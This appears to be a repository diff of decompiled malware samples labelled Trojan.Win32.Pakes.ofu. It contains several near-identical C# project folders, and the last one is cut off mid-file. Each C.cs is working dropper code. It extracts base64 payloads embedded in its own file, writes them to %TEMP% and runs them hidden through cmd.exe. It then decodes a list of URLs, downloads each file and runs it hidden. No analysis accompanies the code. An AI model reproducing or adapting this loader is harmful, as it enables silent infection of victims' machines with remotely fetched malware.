<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>n</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="C.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-9c0e9addf7e09323776486d50764f39d7556b844377e327710c138cb308804d0/Trojan.Win32.Pakes.ofu.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "g", "Trojan.Win32.Pakes.ofu-9c0e9addf7e09323776486d50764f39d7556b844377e327710c138cb308804d0.csproj", "{6EDE12CE-6227-4D5B-8BDA-873B05B7D2A9}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{6EDE12CE-6227-4D5B-8BDA-873B05B7D2A9}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{6EDE12CE-6227-4D5B-8BDA-873B05B7D2A9}.Debug|Any CPU.Build.0 = Debug|Any CPU
{6EDE12CE-6227-4D5B-8BDA-873B05B7D2A9}.Release|Any CPU.ActiveCfg = Release|Any CPU
{6EDE12CE-6227-4D5B-8BDA-873B05B7D2A9}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-b75a45700559264a2ddbc6705336f3e3fabada8ad65e34254dfb751348adf2af/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-b75a45700559264a2ddbc6705336f3e3fabada8ad65e34254dfb751348adf2af/C.cs
+133
View File
@@ -0,0 +1,133 @@
// Decompiled with JetBrains decompiler
// Type: n.C
// Assembly: g, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BF8D38A2-3CA7-4EC1-9420-BC56FCE07E26
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Pakes.ofu-b75a45700559264a2ddbc6705336f3e3fabada8ad65e34254dfb751348adf2af.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections;
using System.Net;
using System.Text;
namespace n
{
public class C
{
[STAThread]
public static void main()
{
string str1 = "CMD.exe /k start %TEMP%\\";
string Expression1 = "TEMP";
try
{
C c1 = new C();
Array Instance1 = (Array) Strings.Split(System.IO.File.ReadAllText(AppDomain.CurrentDomain.FriendlyName), "**");
Array Instance2 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 1
}, (string[]) null)), "&");
Array Instance3 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 0
}, (string[]) null)), "\r\n");
Array Instance4 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 1
}, (string[]) null)), "\r\n");
int num1 = checked (Instance4.Length - 2);
int num2 = 0;
while (num2 <= num1)
{
try
{
System.IO.File.WriteAllBytes(Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\" + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), c1.v(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance4, new object[1]
{
(object) num2
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), AppWinStyle.Hide);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
checked { ++num2; }
}
if (Operators.CompareString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 2
}, (string[]) null).ToString(), "^", false) == 0)
return;
C c2 = c1;
Array Instance5 = Instance1;
object[] objArray1 = new object[1];
object[] objArray2 = objArray1;
int num3 = 2;
// ISSUE: variable of a boxed type
__Boxed<int> local1 = (ValueType) num3;
objArray2[0] = (object) local1;
object[] Arguments = objArray1;
string str2 = Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance5, Arguments, (string[]) null));
ref string local2 = ref str2;
string Expression2 = c2.t(ref local2);
NewLateBinding.LateIndexSetComplex((object) Instance1, new object[2]
{
(object) num3,
(object) str2
}, (string[]) null, true, false);
Array array = (Array) Strings.Split(Expression2, "\r\n");
int num4 = 0;
try
{
foreach (object obj in array)
{
string str3 = Conversions.ToString(obj);
try
{
if (Operators.CompareString(str3, "", false) == 0)
ProjectData.EndApp();
Array Instance6 = (Array) Strings.Split(str3, ".");
new WebClient().DownloadFile(str3, Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + "F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))), AppWinStyle.Hide);
checked { ++num4; }
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
finally
{
IEnumerator enumerator;
if (enumerator is IDisposable)
(enumerator as IDisposable).Dispose();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public byte[] v(string s) => Convert.FromBase64String(s);
public string t(ref string s) => Encoding.UTF8.GetString(Convert.FromBase64String(s));
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-b75a45700559264a2ddbc6705336f3e3fabada8ad65e34254dfb751348adf2af/Trojan.Win32.Pakes.ofu.csproj
+41
View File
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Pakes.ofu-b75a45700559264a2ddbc6705336f3e3fabada8ad65e34254dfb751348adf2af.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{07BE9FA1-5B83-4734-92C5-2A01474C360B}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>g</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>n</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="C.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-b75a45700559264a2ddbc6705336f3e3fabada8ad65e34254dfb751348adf2af/Trojan.Win32.Pakes.ofu.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "g", "Trojan.Win32.Pakes.ofu-b75a45700559264a2ddbc6705336f3e3fabada8ad65e34254dfb751348adf2af.csproj", "{07BE9FA1-5B83-4734-92C5-2A01474C360B}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{07BE9FA1-5B83-4734-92C5-2A01474C360B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{07BE9FA1-5B83-4734-92C5-2A01474C360B}.Debug|Any CPU.Build.0 = Debug|Any CPU
{07BE9FA1-5B83-4734-92C5-2A01474C360B}.Release|Any CPU.ActiveCfg = Release|Any CPU
{07BE9FA1-5B83-4734-92C5-2A01474C360B}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-dc29ba9c0ad8cd76fb4a42aafbf2994b45c55b81a870bc303c8449e0191403ae/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-dc29ba9c0ad8cd76fb4a42aafbf2994b45c55b81a870bc303c8449e0191403ae/C.cs
+133
View File
@@ -0,0 +1,133 @@
// Decompiled with JetBrains decompiler
// Type: n.C
// Assembly: g, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BF8D38A2-3CA7-4EC1-9420-BC56FCE07E26
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Pakes.ofu-dc29ba9c0ad8cd76fb4a42aafbf2994b45c55b81a870bc303c8449e0191403ae.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections;
using System.Net;
using System.Text;
namespace n
{
public class C
{
[STAThread]
public static void main()
{
string str1 = "CMD.exe /k start %TEMP%\\";
string Expression1 = "TEMP";
try
{
C c1 = new C();
Array Instance1 = (Array) Strings.Split(System.IO.File.ReadAllText(AppDomain.CurrentDomain.FriendlyName), "**");
Array Instance2 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 1
}, (string[]) null)), "&");
Array Instance3 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 0
}, (string[]) null)), "\r\n");
Array Instance4 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 1
}, (string[]) null)), "\r\n");
int num1 = checked (Instance4.Length - 2);
int num2 = 0;
while (num2 <= num1)
{
try
{
System.IO.File.WriteAllBytes(Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\" + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), c1.v(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance4, new object[1]
{
(object) num2
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), AppWinStyle.Hide);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
checked { ++num2; }
}
if (Operators.CompareString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 2
}, (string[]) null).ToString(), "^", false) == 0)
return;
C c2 = c1;
Array Instance5 = Instance1;
object[] objArray1 = new object[1];
object[] objArray2 = objArray1;
int num3 = 2;
// ISSUE: variable of a boxed type
__Boxed<int> local1 = (ValueType) num3;
objArray2[0] = (object) local1;
object[] Arguments = objArray1;
string str2 = Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance5, Arguments, (string[]) null));
ref string local2 = ref str2;
string Expression2 = c2.t(ref local2);
NewLateBinding.LateIndexSetComplex((object) Instance1, new object[2]
{
(object) num3,
(object) str2
}, (string[]) null, true, false);
Array array = (Array) Strings.Split(Expression2, "\r\n");
int num4 = 0;
try
{
foreach (object obj in array)
{
string str3 = Conversions.ToString(obj);
try
{
if (Operators.CompareString(str3, "", false) == 0)
ProjectData.EndApp();
Array Instance6 = (Array) Strings.Split(str3, ".");
new WebClient().DownloadFile(str3, Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + "F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))), AppWinStyle.Hide);
checked { ++num4; }
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
finally
{
IEnumerator enumerator;
if (enumerator is IDisposable)
(enumerator as IDisposable).Dispose();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public byte[] v(string s) => Convert.FromBase64String(s);
public string t(ref string s) => Encoding.UTF8.GetString(Convert.FromBase64String(s));
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-dc29ba9c0ad8cd76fb4a42aafbf2994b45c55b81a870bc303c8449e0191403ae/Trojan.Win32.Pakes.ofu.csproj
+41
View File
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Pakes.ofu-dc29ba9c0ad8cd76fb4a42aafbf2994b45c55b81a870bc303c8449e0191403ae.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{060B41F0-6140-45A5-AB3C-DCE3CAE79A85}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>g</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>n</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="C.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-dc29ba9c0ad8cd76fb4a42aafbf2994b45c55b81a870bc303c8449e0191403ae/Trojan.Win32.Pakes.ofu.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "g", "Trojan.Win32.Pakes.ofu-dc29ba9c0ad8cd76fb4a42aafbf2994b45c55b81a870bc303c8449e0191403ae.csproj", "{060B41F0-6140-45A5-AB3C-DCE3CAE79A85}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{060B41F0-6140-45A5-AB3C-DCE3CAE79A85}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{060B41F0-6140-45A5-AB3C-DCE3CAE79A85}.Debug|Any CPU.Build.0 = Debug|Any CPU
{060B41F0-6140-45A5-AB3C-DCE3CAE79A85}.Release|Any CPU.ActiveCfg = Release|Any CPU
{060B41F0-6140-45A5-AB3C-DCE3CAE79A85}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-ec9586122f78047c38e5841b03c6769a50700bb509faa299b7aa58a58ef67877/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-ec9586122f78047c38e5841b03c6769a50700bb509faa299b7aa58a58ef67877/C.cs
+133
View File
@@ -0,0 +1,133 @@
// Decompiled with JetBrains decompiler
// Type: n.C
// Assembly: g, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BF8D38A2-3CA7-4EC1-9420-BC56FCE07E26
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Pakes.ofu-ec9586122f78047c38e5841b03c6769a50700bb509faa299b7aa58a58ef67877.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections;
using System.Net;
using System.Text;
namespace n
{
public class C
{
[STAThread]
public static void main()
{
string str1 = "CMD.exe /k start %TEMP%\\";
string Expression1 = "TEMP";
try
{
C c1 = new C();
Array Instance1 = (Array) Strings.Split(System.IO.File.ReadAllText(AppDomain.CurrentDomain.FriendlyName), "**");
Array Instance2 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 1
}, (string[]) null)), "&");
Array Instance3 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 0
}, (string[]) null)), "\r\n");
Array Instance4 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 1
}, (string[]) null)), "\r\n");
int num1 = checked (Instance4.Length - 2);
int num2 = 0;
while (num2 <= num1)
{
try
{
System.IO.File.WriteAllBytes(Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\" + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), c1.v(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance4, new object[1]
{
(object) num2
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), AppWinStyle.Hide);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
checked { ++num2; }
}
if (Operators.CompareString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 2
}, (string[]) null).ToString(), "^", false) == 0)
return;
C c2 = c1;
Array Instance5 = Instance1;
object[] objArray1 = new object[1];
object[] objArray2 = objArray1;
int num3 = 2;
// ISSUE: variable of a boxed type
__Boxed<int> local1 = (ValueType) num3;
objArray2[0] = (object) local1;
object[] Arguments = objArray1;
string str2 = Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance5, Arguments, (string[]) null));
ref string local2 = ref str2;
string Expression2 = c2.t(ref local2);
NewLateBinding.LateIndexSetComplex((object) Instance1, new object[2]
{
(object) num3,
(object) str2
}, (string[]) null, true, false);
Array array = (Array) Strings.Split(Expression2, "\r\n");
int num4 = 0;
try
{
foreach (object obj in array)
{
string str3 = Conversions.ToString(obj);
try
{
if (Operators.CompareString(str3, "", false) == 0)
ProjectData.EndApp();
Array Instance6 = (Array) Strings.Split(str3, ".");
new WebClient().DownloadFile(str3, Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + "F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))), AppWinStyle.Hide);
checked { ++num4; }
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
finally
{
IEnumerator enumerator;
if (enumerator is IDisposable)
(enumerator as IDisposable).Dispose();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public byte[] v(string s) => Convert.FromBase64String(s);
public string t(ref string s) => Encoding.UTF8.GetString(Convert.FromBase64String(s));
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-ec9586122f78047c38e5841b03c6769a50700bb509faa299b7aa58a58ef67877/Trojan.Win32.Pakes.ofu.csproj
+41
View File
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Pakes.ofu-ec9586122f78047c38e5841b03c6769a50700bb509faa299b7aa58a58ef67877.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{0CF8B261-4C87-4C0F-9F9A-21FEA6DB3759}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>g</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>n</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="C.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-ec9586122f78047c38e5841b03c6769a50700bb509faa299b7aa58a58ef67877/Trojan.Win32.Pakes.ofu.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "g", "Trojan.Win32.Pakes.ofu-ec9586122f78047c38e5841b03c6769a50700bb509faa299b7aa58a58ef67877.csproj", "{0CF8B261-4C87-4C0F-9F9A-21FEA6DB3759}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{0CF8B261-4C87-4C0F-9F9A-21FEA6DB3759}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{0CF8B261-4C87-4C0F-9F9A-21FEA6DB3759}.Debug|Any CPU.Build.0 = Debug|Any CPU
{0CF8B261-4C87-4C0F-9F9A-21FEA6DB3759}.Release|Any CPU.ActiveCfg = Release|Any CPU
{0CF8B261-4C87-4C0F-9F9A-21FEA6DB3759}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-f856a557aba5c4e79ea585a6f9988e259e3025ed5246a4d0d37087ccd0159aeb/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-f856a557aba5c4e79ea585a6f9988e259e3025ed5246a4d0d37087ccd0159aeb/C.cs
+133
View File
@@ -0,0 +1,133 @@
// Decompiled with JetBrains decompiler
// Type: n.C
// Assembly: g, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BF8D38A2-3CA7-4EC1-9420-BC56FCE07E26
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Pakes.ofu-f856a557aba5c4e79ea585a6f9988e259e3025ed5246a4d0d37087ccd0159aeb.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections;
using System.Net;
using System.Text;
namespace n
{
public class C
{
[STAThread]
public static void main()
{
string str1 = "CMD.exe /k start %TEMP%\\";
string Expression1 = "TEMP";
try
{
C c1 = new C();
Array Instance1 = (Array) Strings.Split(System.IO.File.ReadAllText(AppDomain.CurrentDomain.FriendlyName), "**");
Array Instance2 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 1
}, (string[]) null)), "&");
Array Instance3 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 0
}, (string[]) null)), "\r\n");
Array Instance4 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 1
}, (string[]) null)), "\r\n");
int num1 = checked (Instance4.Length - 2);
int num2 = 0;
while (num2 <= num1)
{
try
{
System.IO.File.WriteAllBytes(Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\" + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), c1.v(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance4, new object[1]
{
(object) num2
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), AppWinStyle.Hide);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
checked { ++num2; }
}
if (Operators.CompareString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 2
}, (string[]) null).ToString(), "^", false) == 0)
return;
C c2 = c1;
Array Instance5 = Instance1;
object[] objArray1 = new object[1];
object[] objArray2 = objArray1;
int num3 = 2;
// ISSUE: variable of a boxed type
__Boxed<int> local1 = (ValueType) num3;
objArray2[0] = (object) local1;
object[] Arguments = objArray1;
string str2 = Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance5, Arguments, (string[]) null));
ref string local2 = ref str2;
string Expression2 = c2.t(ref local2);
NewLateBinding.LateIndexSetComplex((object) Instance1, new object[2]
{
(object) num3,
